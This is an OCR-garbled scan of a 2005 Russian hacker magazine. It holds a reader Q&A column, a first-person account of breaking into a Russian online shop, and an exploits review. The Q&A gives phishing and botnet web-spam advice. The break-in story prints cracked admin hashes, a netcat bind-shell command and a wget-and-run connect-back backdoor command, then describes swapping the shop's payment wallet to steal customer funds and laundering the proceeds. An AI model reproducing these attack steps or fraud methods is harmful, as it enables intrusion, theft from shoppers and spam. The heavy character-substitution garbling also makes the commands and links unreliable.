зесцгііу-обновления и файрволы. После успешного «обезвреживания» 
системы, из интернета скачивается третья софтина — Міідііебег, которая 
либо подключает зараженный комп к зомби-ботнету, либо открывает ре- 
лей для рассылки спама. Как водится, вся вереница заразы успешно 
функционирует на любых ѵѵіп-машинах. 

О: Мне звонят, а телефон внезапно поднимает трубку. Почему так происхо- 
дит и как от этого избавиться? 

А: В твоем случае срабатывает опция авто-ответа (аи(о-апз(Д/ег), то есть ап- 
парат автоматически поднимает трубку после нескольких гудков. Фича бы- 
ла разработана для водителей и инвалидов. Первые часто используют по- 
добное в комбинации о Рапбз-Ігее гарнитурой. Если ты не постоянно за ру- 
лем и не на колесах инвалидной коляски, рассматриваемое лучше отклю- 
чить. Настройки могут меняться от телефона к телефону, но в большинстве 
из них аиіо-апзѵѵег врубается-вырубается в отделе Напбз-Ргее или в «спе- 
циальных настройках». Как раз недавно читал забавное сообщение о том, 
как опозорилась двое американских копов, когда их секретный разговор 
подслушал драг-дилер, просто позвонив одному из них на телефон. Как по- 
лагается, звук с вибратором были отключены, и этот негодяй без проблем 
разузнал последние новости от чекистов. 

О: В чем суть ВІиѳЬид-атаки? 

А: Самая простая реализация атаки позволяет стягивать чужие записные 
книжки и списки совершенных звонков, получить доступ к архиву 8МЗ и 
писать те же сообщения от имени захваченного телефона. С развитием 



А: Изучая инструкцию к автомобилю, не следует ожидать там объяснения пра- 
вил дорожного движения. Так и здесь, твой 83Н-клиент — это лишь прога для 
управления удаленным сервером, когда как описание «команд» можно встре- 
тить в мануале по операционной системе, установленной на сервере. Если ты 
не заинтересован в познании всех основ Упіх, то идеальным решением могут 
оказаться справочники, где кратко изложены базовые концепции и команды 
операционки. Сам до сих пор пользуюсь книгой 1998 года издания — «ІІпіх 
справочник» от Кевина Рейчарда. Когда инфа нужна в срочном порядке, сто- 
ит обратиться в хранилища инета, вроде ІіпихсІос.ги, ІІЬ.ги и оретеі.т. Из 
собственного опыта, когда необходимо узнать нечто большее, чем «команды», 
систему следует изучать локально, не ограничиваясь удаленной работой. 

О: Можно ли сканить шары, используя Ыпцх-тачку? 

А: Учитывая орепзоигсе статус системы, можно без труда переписать обык- 
новенный загпЬа-клиент, сделав его сканером. Любимому читателю не 
всегда приходится по душе конструкторы «сделай сам», где юзеру нужно 
корпеть над кодом. Для них существует ряд готовых решений, вроде нека- 
зистого, но обладающего всем необходимым — дЗгпЬЗсаппег (дзтЬвсап- 
пег.воигсеіогде.пеі). Эта софтина очень похожа на виндовый сканер 
Еззепііаі Меі Тооіз. 

О: Подумываю заняться ррізіііпд'ом. Какой самый простой способ зама- 
нить ушастых? 

А: Вкратце, частный случай рИізбіпд'а — разводка юзеров, путем заманива- 
ния на ѵѵеЬ-оайт, который оказывается очень похож на некую известную се- 
тевую точку из области коммерции, вроде банков или аукционов. Простей- 
ший пример подставного УНЕ'а: Шр://відпіп.еЬау.сот@ 11 .22.33.44/, нажав 
на который, юзер попадает вовсе не на еВау, а на сайт, поднятый злоумыш- 
ленниками по адресу Шр://11. 22.33.44. Забив же \л/тт.раураІ.сот, ты 
натравишь свой браузер вовсе не на «хранилище палок», а окажешься на 
№ѵѵѵѵ.хп-рураІ-4ѵе.сот, где снова может быть развернута подстава. Более 
детально с возможными методами мозго-опудривания ты можешь ознако- 
миться на ѵтт.вкітоо.сот/Шп. 




О: Как можно обороняться от рРіаРіпд'а? 

А: Ответ-существительное: головой. Ответ-глагол: думать. Думая голо- 
вой, ты вряд ли попадешься на удочку разводил. Думать же головой 
слишком часто окажется не обязательно, когда в твою систему будет 
вписан надлежащий софт. Одна из последних софтин по теме — 
ЗрооІЗІІск (тмѵѵ.согевІгееІ.сот/зрооШіск). Эта программа оформлена в 
виде симпатичного плагина для браузера, который не вызывает каких- 
либо вопросов в управлении. Прога регулярно пополняет список под- 
дельных сайтов, предупреждая тебя при попытках посетить подобные за- 
ведения аферистов. Также ты будешь постоянно видеть, на каком сайте 
ты находишься в действительности; настоящий ІІНк будет всегда выве- 
ден яркими буквами. Есть ІЕ'шная, так и РігеРох'овская версия. Если 
софт не придется по вкусу, есть неплохая альтернатива — Меісгай 
ТооІЬаг от легенды сетевого исследования. 

О: Микрософт хочет выкинуть на рынок новое зесигііу-обновление 
РаІІабіит. Что это такое? 

А: Потуги М3 по теме безопасности вызывает ровно столько же вопросов, 
сколько и одобрений. Всякие старания могут принести не только спокой- 
ствие, но и ряд затруднений, как и получилось с обращенным в наращива- 
ние обороны ЗР2 ѴѴІпХР. РаІІасІіит — изначальное название системы, ко- 
торая ныне представлена, как Мехі-Оепегаііоп Зесиге Сотриііпд Вазе 
(МѲЗСВ). В данном случае фирма пробует собрать все имеющиеся Рагб- 
ѵѵаге и зоКѵѵаге силы в единой борьбе за повышенную безопасность. Пер- 
воначально предполагалось, что МОЗСВ будет существовать как отдель- 
ная система, запущенная параллельно основной оси. В своем движении, 
оно обеспечит повышенную изоляцию процессов, сохранность данных и 
надежную авторизацию. Идея, безусловно, заслуживает, как минимум, не- 
мого одобрения. Однако реализация задержалась, поскольку для работы 
о МѲЗСВ кодерам пришлось бы переписывать очень многие детали своих 
творений. Учитывая имеющиеся и возможные сложности, М3 отказалась 
от слишком резких шагов, внедряя новую тему постепенно. Последний ре- 
лиз ЕопдРогп'а включает первый кусочек удовольствия — Зесиге ЗІаПир. 



Нововведение должно обеспечить целостность софта и железа системы 
перед запуском, чтобы предотвратить нелегальный доступ и предупредить 
возможные проблемы из-за железных косяков. Ожидается, что на новой 
базе ІЕ будет работать внутри виртуальной машины и функционировать 
«вне» основной ОС. 

О: Хочу стянуть одну БД весом в 150 гигов. Да так, чтобы все на ноут влез- 
ло. Какие советы? 

А: Очевидно, тебе нужен винч подходящего размера. Внешний НОО-гаск о 
обыкновенным винтом даст кучу пространства, куда войдет искомое без 
каких-либо проблем. Если же скачивание предполагается в экстремальных 
условиях, когда внешний винт, которому обыкновенно нужно отдельное 
АС/ОС питание, оказывается непозволительной роскошью, придется тебе 
менять внутренний винчестер на более вместительный. Здесь нас выручит 
компания Зеадаіе о 2.5-дюймовым творением из линейки МотепШт. Ты 
получишь 160 гигов — столь убедительной цифры удалось достигнуть бла- 
годаря применению технологии перпендикулярной записи. Уже сейчас дос- 
тупна 5400 грт модель, а 7200 выйдет к концу года. 

О: Собрал огромный ботнет. Как бы мне его заюзать для спама на ѵѵеЬ'е? 

А: Если понимать под «спамом на ѵѵеЬ'е» — постинги рекламы и других ра- 
достей в форумы и гостевухи, то злостные хакеры нашли применение бес- 
численным стадам зомби-компов. Злодеи составляют список гостевух, ку- 
да будут вливаться месаги. В отдельных случаях при невозможности диезі- 
постинга (будучи незарегистрированным), придется проводить регистра- 
ции ников, а спам будет распространен после идентификации юзвера. По- 
мимо разброса, умные боты умеют также собирать отклики на посты (нап- 
ример, вопросы по влитой рекламе или угрозы расправы от админов бор- 
ды). Помимо публичного спама возможен и персональный вариант оного — 
рассылка сообщений как РМ'ок для юзеров борды. Здесь могут быть задей- 
ствованы не только форумы, но и службы объявлений (служба знакомств 
— серийный пример). Уже были замечены меркантильные особы, которые 
предлагали такой \л/еЬ-спам за деньги з: 
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ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОІО СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕПРУМ НЬЮСЫ 




Масштабная покупка 

НЕ ТАК ДАВНО МЫ ПОЛУЧИЛИ ЗАМЕЧАТЕЛЬНОЕ 
ПИСЬМО. НЕКИЙ ХАКЕР, ПРОСИВШИЙ НЕ ВЫДАВАТЬ 
ЕГО ИМЕНИ, ОПИСАЛ ПОТРЯСНЫЙ ВЗЛОМ ИНТЕРНЕТ- 
МАГАЗИНА И ПОЖЕЛАЛ, ЧТОБЫ МЫ ОПУБЛИКОВАЛИ 
ЭТУ ИСТОРИЮ В ЖУРНАЛЕ. САМ ПРОЦЕСС ВЗЛОМА 
БЫЛ ОЧЕНЬ ИНТЕРЕСЕН И ПОДКРЕПЛЕН РЕАЛЬНЫМИ 
ДАННЫМИ, ПОЭТОМУ МЫ БЕЗО ВСЯКОГО СОМНЕНИЯ 
ПОВЕРИЛИ ЧИТАТЕЛЮ И ПРЕДОСТАВИЛИ ЕМУ 
ВОЗМОЖНОСТЬ РАССКАЗАТЬ О СВОЕМ ПОДВИГЕ — 

О ВЗЛОМЕ КРУПНОГО РОССИЙСКОГО ИНТЕРНЕТ- 
МАГАЗИНА. ЧТО, ПОТЕКЛИ СЛЮНКИ? і) I Мазіег-іате-гпазіег 



История взлома российского 
интернет-магазина 

[лиха беда начало] Одним прекрасным летним днем, когда все нормальные 
люди веселятся за городом на реке, я сидел в душной комнате и, проклиная 
свой образ жизни, заканчивал работу над очередным заказным взломом. За- 
казчик оказался адекватным человеком, поэтому расплатился со мной почти 
сразу, добавив сверху $1 00 премиальных за срочность. Получив увесистую сум- 
му на свой ѴѴМ-кошелек мне захотелось прикупить себе какой-нибудь новый 
крутой девайс для компа — налить деньги было совершенно влом, поэтому со- 
вершить покупку я решил в электронном магазине. Зайдя на Яндекс, я столк- 
нулся с солидным списком крупных сетевых магазинов и выбрал один из них. 
Далее ситуация развивалась очень интересным образом. Я посмотрел прайс- 
листы на железки и уже определился с заказом, ткнул на кнопку «Оформить» 
и увидел, что платить придется либо через Сбербанк, либо наложенным плате- 
жом. Однако в последней строчке страницы я увидел текст, гласящий о том, что 
администрация магазина принимает так же оплату и виртуальными деньгами, 
но без автоматического оформления сделки. Иными словами, утром — деньги, 
вечером — стулья, об автоматическом процессинге платежей эти ребята ничего 
не слышали :(. К сожалению, таким средневековым способом оплаты практику- 
ют множество виртуальных барахолок, что едва ли украшает интернет. 

На этом история не заканчивается. Строкой ниже я увидел следующее объ- 
явление: «Если у вас возникли проблемы или пожелания — напишите об 
этом в наш форум». Ого, да у них еще и форум есть! Сейчас посмотрим. 
Кликнув по ссылке, я попал на очень интересную борду под названием 
іпѵізіоп Роѵѵег ВоагсІ. Надо сказать, я являюсь человеком, компетентным в 
вопросах безопасности, поэтому знаю, чем ежедневно пополняются багтра- 
ки. Двумя днями ранее я потрошил код эксплойта для ІРВ версии 1 .3-2. 0.3, 
который показал себя очень эффективно. Сперва я подумал, что админист- 
рация просто изменила версию, чтобы отпугнуть хакеров, но по внешнему 
виду ІРВ действительно принадлежал первой ветке. Незамедлительно я ре- 
шил попробовать поломать ветхий форум о помощью творения от гзі 
Я запустил эксплойт с параметрами ѵѵѵѵѵі/.сооі-евіюр.ги /тад^огигп 1 1, где 
цифры означали тип таргета (единичка — первая версия, двойка — вторая) 
и іб пользователя, чей пароль необходимо вытащить. Через тридцать се- 
кунд перебора, сценарий вернул мне МВ5-хэш админа. Теперь у меня было 
два варианта: либо попробовать подменить свой кукиз и залогиниться под 
администратором, либо расшифровать пассворд и применить его для дру- 
гих целей. Мысленно прикинув, я решил остановиться на втором, потому как 
лишний раз светиться на ѴѴѴѴѴѴ мне не хотелось, да и, зная админку ІРВ, 
я предположил, что особых результатов все равно не добьюсь. Взломать 




хэш было вполне реально, поскольку в первой версии форума пассворд хэ- 
шируется один раз (во второй ветке выданный М05 нужно было расшиф- 
ровать уже дважды, что практически невозможно). Повторив запуск 
эксплойта для первых 6-ти идентификаторов (все они были админами), 
я собрал пары Іодіп:тб5_раззѵѵогб и сохранил в отдельный файл: 

[файл С хэшами админов] 

асІтіп:0сітЫ7се71 88983СІ971 9467аОІ7е1 е 
тада(іт:20а1 31 27068ае21 1 1 71 с71 5а2е87с1465 
1окиз:6940е8е23112ес1982ЬЗе1 831 7691 Ь9(1 
та$1ег:с0891 Ь7ас12ас11 с87Ь8са1 9сс14с7ЬЬ792 
\л/\л/ѵѵ:2603Ы50474е84а6202160258394а99с 

[мозговой штурм] Традиционно для взлома М05-паролей я использую 
программу МОбІпзібе. Она много раз меня выручала, поэтому завоевала 
статус лучшего брутфорсера. Но в этот раз никакие словари меня не выру- 
чили — перебор по каждому из них не дал положительного результата. За- 
пускать МОбІпзібе (Шр://пвб.ги/50І(/1/апо/тсІ5іпзісІе.гір) в режиме перебора 
всех вариантов я не желал — процесс мог занять длительное время, а пой- 
мать удачу хотелось немедленно. Но, вспомнив про промежуточные вари- 
анты перебора, я решил попробовать их в деле. В опциях брутфорсера я 
нашел четыре варианта перебора: цифры, спецсимволы, буквы и заглав- 
ные буквы. Начал о цифр, но перебор особого результата не принес. Тогда 
я захотел побрутить цифры и специальные символы, мало надеясь на уда- 
чу. Я запустил МОбІпзібе, выставил ей высокий приоритет и отправился в 
гости на чашечку чая. Придя домой, я увидел, что перебор завершился, и 
пароль для пользователя абгпіп выглядел так: 12.1982. Видимо админист- 
ратор решил установить в качестве пассворда дату своего рождения, тем 
самым, упростив работу взломщиков. 






Прежде чем осуществлять 
какие-либо электронные 
покупки, обязательно про- 
верь наличие персонально- 
то аттестата у продавца. 

Это можно сделать на 
шшш.шебтопеу.ги. 
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Не стоит забывать, что все 
действия хакера противо- 
законны, поэтому данная 
статья дана лишь для озна- 
комления и организации 
правильной защиты с тво- 
ей стороны. За применение 
материала в незаконных 
целях, автор и редакция от- 
ветственности не несут. 




На компакт-диске ты най- 
дешь утилиту, эмулирую- 
щую псевдотерминал. Что 
касается, Саіп&АЬеІ, то эту 
софтину мы выкладывали 



Далее мне нужно было определиться — что делать о найденным паролем? 
Заходить под ним на форум не хотелось — админ может поглядеть послед- 
ние логи входа и обнаружить несанкционированный доступ. Оставалось 
лишь попробовать найденную дату в качестве ключевого слова для других 
сервисов. Мыло администратора находилось на сервере гатЫег.ги, и вряд 
ли в его майлбоксе была полезная информация. Но проверить, подойдет ли 
пароль, все равно хотелось, поэтому залогинившись на хост рорЗ. гатЫег.ги 
я попробовал аутентифицироваться под пользователем абтіптад. К нес- 
частью, сервер отверг авторизацию и послал меня куда подальше. Однако 
уходить мне не хотелось, и я стал дальше копать под администратора. 

[гнилой Му8^^] Я провел полное сканирование системы. Для работы я 
использовал интеллектуальный сканер от ХЗрісІег (правда, демо-версию). 
Ясное дело, что запускал я сканер, предварительно соединившись о безо- 
пасным ѴРМ-сервером из Европы. Первое сканирование было настолько 
медленным, что я отключил тестирование \д/еЬ-скриптов и прочей дряни. 
В итоге для меня нарисовалось два интересных вывода: 



I ЧТО помогло МНЕ ПРИ ВЗЛОМЕ? I 

[О Ежедневное посещение багтрака привело к тому, что я 
сразу смекнул, чем можно сломать форум, установленный на 
сайте интернет-магазина. 

[Ц Я не поленился проверить права у пользователя абтіп. 
Нередко администраторы забывают, что полный доступ к 
системным таблицам может привести к тяжким последствиям, 
[з] Утилита, эмулирующая псевдотерминал очень помогла мне 
поднять права до рутовских :). 



[Т] в системе был открыт наружу 21 ,80 и 3306 порты 
[Ц Удаленный РіпдегРгіпІ показал, что сервак управляется операционкой 
ЯесІНаІ 9.0 

Зацепившись нза 21 порт, я увидел стандартное приглашение сервиса \Л/ц- 
РТРО. Как известно, сервис этот чрезвычайно дырявый и каждый месяц 
в нем обнаруживают не одну уязвимость. Однако видимо админ никогда не 
носил пионерский галстук: версия демона была непробиваемой, да и апоп- 
ітоиз'а в систему не пускали. Почему-то я подумал, что баннер сервиса по- 
может мне узнать операционку. Обратившись к гуглу со специальным зап- 
росом, я стал разгребать сотни ответов, некоторые из которых сообщили 
мне, что эта версия и в самом деле поставляется с девятой шапкой. Таким 
образом, тип операционной системы был явно определен. 

Что касается апача, то он был пуленепробиваем. Стоял последний релиз из 
ветки 1 .3 безо всяких модулей кроме гпос1_р1тр. Коннект на порт 3306 пока- 
зал, что на серваке запущен туЗОЕ, но свою версию демон никак не хотел 
выдавать. Не знаю почему, но я захотел приконнектится к базе виндовым 
клиентом под недавно обрученным аккаунтом. И не ошибся: сервак успеш- 
но авторизовал меня под пользователем абтіп и паролем 12.1982. Уже из 
клиента ѴѴІпМуздІ мне удалось точно определить релиз сервиса и просмот- 
реть все таблицы. Собственно, БД кроме тузді, Іезі и тад_1огит там ниче- 
го не было, но сам факт, что пароль к сервису подошел, наводил на мысли. 
И тут я вспомнил про еще один замечательный эксплойт. Он позволял вы- 
полнять любые команды с правами пользователя туздісі. Однако сам 
я эксплойт не тестировал, но мой виртуальный корефан изучил код о голо- 
вы до ног, менял о закрытыми глазами шеллкоды под различные ОЗ и ре- 
ально умел получать шеллы. Я обратился к нему за помощью, чтобы видо- 
изменить сырец под систему РесіНаІ 9.0. Вообще, нужно было закодиро- 
вать библиотеку ІІЬзо.зо.О, так как ее код уникален для каждой оси. Това- 
рищ с радостью выручил меня, хотя сначала кинул ссылку на мануал, но в 
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ОДИН из паролей поддался хакеру! 



ответ получил мессагу, что я плохо знаю английский :). 

Итак, поменяв в коде две переменные изег и разв, я запустил эксплойт и 
увидел строчку «Моѵѵ изе уоиг [аѵ зРеІІ апсі Із /Ітр/ісі -I». Можно было понять, 
что сплоит пашет и реально выполняет код в системе. Теперь мне нужно 
было сформировать удаленную команду для запуска шелла. Закомменти- 
рованный запрос Уизг/зЬіп/пс -I -р 8000 -е /Ьіп/ЬазР' вполне удовлетворял 
мои потребности, но я не был уверен, существует ли в системе пеісаі. Впро- 
чем, по умолчанию на красную шапку он устанавливается, поэтому я рас- 
комментировал эту строчку и заново запустил вредоносный код. Он снова 
выполнился без проблем, но достучаться до 8000 порта я не мог — мешал 
файрвол. Пришлось искать в инете код соппЬаск-бэкдора, заливать его на 
шелл и запускать. Все эти действия я реализовал в одной команде: 

$стсІ=’\л/деІ (іо$131337.пагосІ.ги/сЬ.с -0 Лтр/сЬ.с; дсс Лшр/сЬ.с -о 
Лтр/сЬ;Лтр/сЫ1.11.11.1Г 

Здесь 11.11.11.11 — айпишник моего взломанного шелла. На этой машине 
я запустил неткат на слушал 5544 порт. После запуска сплоита появилось 
приветствие и пожелание удачи в нелегком бою :). Таким образом, я стал 
обладателем шелла на серваке виртуального магазина. 

[борьба за гооі-права] С первого взгляда я понял, что имею дело с ре- 
альным выделенным сервером на крупной площадке одного известного хос- 
тера. Что касается зашиты, то здесь все было на уровне — я даже не мог 
посмотреть контент сайта — сплошной регтіззіоп бепіесі :). Но я не отчаи- 
вался и продолжал искать лазейку. Мои права были равны полномочиям 
пользователя тузрісі — именно под ним был запущен демон. О взломе яд- 
ра можно было забыть сразу — кернел в девятой шляпе изначально не бь- 
ется никакими эксплойтами. Из сервисов были запущены лишь ехіт, гпуздісі 
и ИНрб. Я уже было хотел сложить оружие и ограничиться тем, что и так до- 
бился максимума, но вспомнил про то, что у меня имелся доступ к туздісі. 
Почему-то я вспомнил про типичную ошибку администраторов; многие ад- 
мины любят ставить одинаковые пароли на разные сервисы. В таблице 
тузді.изег я быстро нашел рутовый хэш и горел желанием его расшифро- 
вать. Однако М05Іпзісіе отказался распознавать формат МуЗ^^, поэтому я 
доверил сложную работу другому брутфорсеру и сниферу по совместитель- 
ству :). Его имя — Саіп&АЬеІ (ѵѵѵѵ\А/.охісІ.ІІ/сІо\А/пІоасІз/са_веІир.ехе). Загрузив 
в раздел Сгаскег->МуЗОЕ Назітез рутовый хэш, я добавил 6 увесистых сло- 
вариков. На третьем словаре процесс перебора завершился — паролем яв- 
лялась строка «ѵІцІрЬу», что в переводе на русский означает «магазин». 

Но сразу получить рутовые права было невозможно. Чтобы запустить би- 
нарник зц, нужна была поддержка псевдотерминала. Как ты догадался, 
у меня ее отродясь не было, так как шелл запускался в интерактивном ре- 
жиме. В данной ситуации можно было либо подбирать пароль к другому 
системному логину, либо подвязать поддержку псевдоустройства. Пер- 
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удачный взлом ІРВ 



вый вариант отпадал сразу, потому как 22 порт наглухо фильтровал 
файрвол. А вот насчет второго варианта у меня была реальная идея. Ког- 
да-то давно со мной поделились интересной утилитой под названием ІІуХ. 
Эта программа состояла из сервера и клиента. Сперва запускался сер- 
вер, а затем клиент подключался к нему. В итоге можно было получить 
шелл-доступ с такими же правами, но уже о поддержкой псевдотермина- 
ла /сІеѵ/ІІурО. Я закачал архив на сервер, распаковал его в каталог 
Лтр/ИуХ и запустил бинарник .Даігоп — сервер псевдотерминального де- 
мона. Затем был активирован файл ./^е^ку о параметром 127.0.0.1. И уже 
через секунду я наслаждался шеллом с фейковым /сІеѵ/ііурО. Сразу пос- 
ле этого было запущено приложение /Ь/п/зн, которое не заругалось на от- 
сутствие терминала, правда и не включило «теневой» режим при запро- 
се пароля. Последней улыбкой фортуны для меня был факт совпадения 
системного рутового пароля с тузцГным. 

[небольшой дефейс] Под рутом я мог выполнять любые действия, но 
почему-то захотелось только одного — денег :). Я зашел в каталог с ѵѵѵѵѵѵ- 
документами и скриптами и начал ковыряться в движке интернет-магази- 
на. Сперва я хотел оставить бэкдор в коде, а затем у меня возникло жела- 
ние отписать администратору об ошибках и не лезть на рожон. Но остано- 
вился я на третьем варианте — мне пришла в голову мысль заменить ѴѴМ2, 
указанный на странице с реквизитами на другой кошелек. Админы заметят 
не сразу, а денежки утекут совсем в другом направлении. На этом я и по- 
решил: быстро зарегистрировал себе левый кошелек, который и указал в 
контактах на сайте. 

Как оказалось не я один люблю расплачиваться через ѴѴеЬМопеу. Спустя 
пару дней, ко мне на счет упала сумма в 200 долларов, а еще через день я 
получил дополнительную сотню. Подумав, что такое безобразие обязатель- 
но пресечется, я начал соображать о выводе средств. И мне в голову приш- 
ла замечательная идея — сперва я переслал средства в обменник ѴѴМ2 <> 
Е-Ѳоісі, а затем перенаправил деньги на другой Едоіб-идентификатор. Пос- 
ле этого уже через другой обменник я вывел денежку на свой родной ко- 
шелек. Работа была приятной и чистой :). 

[Тяжкие последствия] По видимому, администратору пришлось не 
сладко, так как бедные клиенты начали спрашивать, почему их деньги уш- 
ли в неизвестном направлении. На следующий день после очередного ма- 
териального пополнения я обнаружил две вещи: форум на сайте был пол- 
ностью удален и все пароли были нерабочими. Спустя сутки мой кошелек 
заблокировали. Причем залочили частично: вход осуществлялся без проб- 
лем, но никакие операции по вводу/выводу средств не поддерживались. 
Видимо администрация ѴѴеЬМопеу решила поймать меня о помощью отс- 
леживания ІР-адреса. Но я не забывал о безопасности и выходил на их ре- 
сурс только через ѴРМч-80СКЗ. Согласись, мало приятного, когда о твоих 
проделках замечает кто-то другой. 

Теперь мой капитал преумножился в несколько раз. Но, несмотря на это, 
я до сих пор ищу Интернет-магазин, только уже не для взлома, а для покуп- 
ки чего-либо стоящего. Только вот затариваться я буду только на ярмарке, 
поддерживающей онлайновый процессинг — будет надежнее :) @ 
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М3 СОІОВ МАМАѲЕМЕЫТ 
ВУРРЕР ОѴЕРРЕОѴѴ 

[описание] За этот летний месяц вышло не так 
уж и много громких эксплойтов, однако некоторые 
багоискатели сумели наделать шума. Так, напри- 
мер, 21 июля некий хакер отыскал уязвимость в 
модуле Іпіегпеі Ехріогег. Важный плагин отвечает 
за подгрузку картинок на страницах ослика. Автор 
эксплойта утверждает, что баг содержится в функ- 
ции ОеЮоІогРгоІІІеЕІетепІ. Ошибка позволяет пе- 
резаписать стек определенным кодом. В сплоите 
содержится шелл-код для запуска блокнота. 

Но не все так хорошо, как написано в багтраке. 
Лично у меня, не получилось запустить ноутпад, 
а максимум, чего я добился — аварийного завер- 
шения работы браузера. Испытания проводи- 
лись на чистой ѴѴІпХР-нЗР2. Попробуй, быть мо- 
жет получится у тебя :). 

[защита] Заіцититься от напасти можно о по- 
мощью очередной заплатки от МіогозоК. Послед- 
нюю ты сможешь найти на официальном сайте М$. 

[ссылки] Вредоносный код находится по адресу 
Шр://зесигіІуІаЬ.ги/_ЕхрІоіІз/2005/07/ісс_ех.сМ. 

[злоключение] Если даже в коде и содержит- 
ся защита от дурака, которую ты не в силах об- 
наружить, то можно применить сплоит в качест- 
ве средства для ОоЗ-атак. Просто попроси нед- 
руга заценить фотку обнаженной красотки :). 

[дгееіе] Эксплойт был написан хакером Зпооц 
{\тт.гесІриІ1ег.пе1/зпооц/ѵ/еЬ). Также объявляется 
благодарность Зк, Еидепе и Зиді за соавторство. 




шелл-код зверского эксплойта 



ІМѴІЗІОМ РОѴѴЕР ВОАВО 1.3-2.Х ЕХРЕОІТ 
[описание] Как ты помнишь, не так давно я 
описывал отличный эксплойт для ІРВ, позволяю- 
щий получать привилегии администратора. Авто- 
ры борды довольно быстро залатали баг, но ущ- 
лые хакеры нашли еще одну ЗОЕ-инъекцию в 
том же самом сценарии Іодіп.рітр. Более того, 
код, как и в прощлый раз, реализован на языке 
РегІ. Суть брещи похожа на предыдущую, поэто- 
му за деталями бага отправляю тебя в прощлый 
обзор эксплойтов :). Традиционно в коде кроется 
защита от детей, но скажу по секрету, найти ее 
может даже человек не особо разбирающийся в 
РегІ. 

Сплоит требует наличия модуля ЕѴѴРлизегАдепІ, 
так что прежде чем его тестировать, убедись в 
правильной работе плагина. Для правильного за- 
пуска эксплойта, ему необходимо передать ряд 
параметров: хост сервера (без префикса бйр://), 
путь к форуму, версию борды (О — 1.3, 1 — 2.x) и 
опционально идентификатор пользователя, пра- 
ва которого надо получить. Уже через несколько 
секунд сплоит выведет хэш нужного пароля. 

[защита] Пока что защиты от бага не существу- 
ет, но автор сплоита предложил метод опасения 
от уязвимости. Для этого замени следующие 
строки в коде скрипта Іодіп.рбр: 

$тісІ = Іп1ѵа1($з1с1->ту_де1 соокіе(тетЬег_ісі)); 
$рісІ = $8М->ту_деІ соокіе(ра$$_Иаз(і); на 
$тісІ = туздІ_езсаре_5Ігіпд(іпІѵаІ($зІсІ->ту_деІ 
соокіе(тетЬег_ісІ))); 

$рісІ = туздІ_езсаре_з1гіпд($з{сІ->ту_деІ соок- 
іе(разз_(іаз(і)); 

Данная модификация может быть произведена 
на всех версиях форума. 

[ссылки] Забирай эксплойт по ссылке Шр-У/зеси- 
гіІуІаЬ.пУ_ЕхрІоіІз/2005/07/ірЬ.рІІхІ. Существует так- 
же клон сплоита, который совсем не нужно патчить 
(Шр://зкісІез.пеІ.пУехрІоіІз/ірЬ_вкісІез.ІхІ). 

[злоключение] Данный релиз эксплойта пока- 
зал, что программисты форума не способны пра- 
вильно закрывать ЗОЕ-уязвимости, поэтому борь- 
ба программистов о хакерами будет продолжать- 
ся еще долгое время. 

[дгееів] Как и в прощлый раз эксплойт написали 
ребята из группы ВНС-зесцгіІу. Г лавный автор выс- 



оплойт для ІРВ в работе 




Докучаев Дмитрий ака РогЬ (1огЬ@геа1. хакер. ги) 

ОБЗОР ЭКСПЛОЙТОВ 

тупает под ником НетизоМеда (\тт.МскуОи.огд). 
РНРВВ <= 2.0.15 ВЕМОТЕ ЗОЕ ОАТАВАЗЕ 
СРЕОЕМТІАЕЗ ОІЗСЕОЗиВЕ ЕХРЕОІТ 
[описание] Как и прогнозировалось в очеред- 
ной раз под хакерский прицел попал форум 
рИрВВ. Багоискатели снова нащли брещь в исход- 
ном коде, позволяющую вызвать ЗОЕ-инъекцию. 
Итогом этой инъекции становится показ конфи- 
денциальных переменных, а именно, базы и таб- 
лицы данных, имя пользователя и пароль доступа 
к МуЗОЕ. В общем — все, что нужно хакеру :). 

Но и это еще не все. Корни ощибки уходят во вре- 
мена нашумевшего бага с переменной ІтІдИІІдЫ и 
специальным символом. Если ты читаешь мой 
обзор, то наверняка понял, о каком эксплойте 
идет речь. Таким образом, о помощью нехитрых 
манипуляций можно заставить эксплойт не толь- 
ко показывать переменные, но и выполнять сис- 
темные команды. Как это сделать, не скажу — 
догадаещься сам :). Подскажу, что по сути 
эксплойт является простым интерфейсом для 
выполнения операции, которую можно легко сде- 
лать через адресную строку браузера. 

[защита] Переустановка форума до более 
позднего релиза разом рещит все проблемы, од- 
нако никто не гарантирует, что хакеры не найдут 
брещь в свежей версии и не порулят твоим сер- 
вером :). Поэтому на твоем месте я бы вообще 
снес рІтрВВ. От греха подальще. 

[ссылки] Для ознакомления можно взять исходный 
код эксплойта по ссылке ШрУ/зесигіІуІаЬ.ги/_ЕхрІоііз/ 
2005/07/ркірЬЬ5есиге0.рІ.М. 

[злоключение] На самом деле ситуация не 
слищком выгодна. В инете становится все слож- 
ней найти рИрВВ 2.0.15, потому как многие веб- 
мастеры изначально стали использовать версию 
2.0.16, но если хорощо поискать, то ты обяза- 
тельно обнаружищь много важных форумов :). 

[дгееіе] Дружно снимаем щляпы перед ЗесигеО 
(дѵг.зеоигесі@дтаіІ.сот). Именно этот человек 
обнаружил баг и написал отличный эксплойт. 




отмычка для ркірВВ 2.0.15 





ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОІО СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕПРУМ НЬЮСЫ 




с помощью дыр в системе и 
браузере, можно поднять бо- 
лее детальную инфу. К при- 
меру, узнать регистрацион- 
ный номер ѴѴІпбот, посмот- 
реть содержимое диска или 
перехватить имя компьютера. 



Наилучший метод защиты от внешнего 
шпионажа — использование ѴРН-соедине- 
ний, либо соксификация всей системы с 
помощью ЗоскзСбаіп (тш.зоск5сбаіп.сот/ 
Шез/и/азоП_зоск8сбаіп_3.11 .148.ехе) 
или ЗоскзСар 

фир://агсбіѵе.зоскв.реггпео.сотп/сді- 
Ып/ботІоаб.рІ). 



Разговорчивый осел 

ПРОБЛЕМА АНОНИМНОСТИ ВОЗНИКЛА ВМЕСТЕ С ПО- 
ЯВЛЕНИЕМ СЕТИ И ГОД ОТ ГОДА СТАНОВИТЬСЯ ВСЕ 
БОЛЕЕ АКТУАЛЬНОЙ. КУЧА ЛЮДЕЙ ПЛАТЯТ УВЕСИС- 
ТЫЕ СУММЫ ЗА СВЕЖИЕ ПРОКСИ-ЛИСТЫ, ДОСТУП К 
ѴРМ-ШЛЮЗАМ И ОЧЕНЬ СИЛЬНО ЗАПАРИВАЮТСЯ НАД 
СОБСТВЕННОЙ АНОНИМНОСТЬЮ. ОДНАКО ОНИ ДАЖЕ 
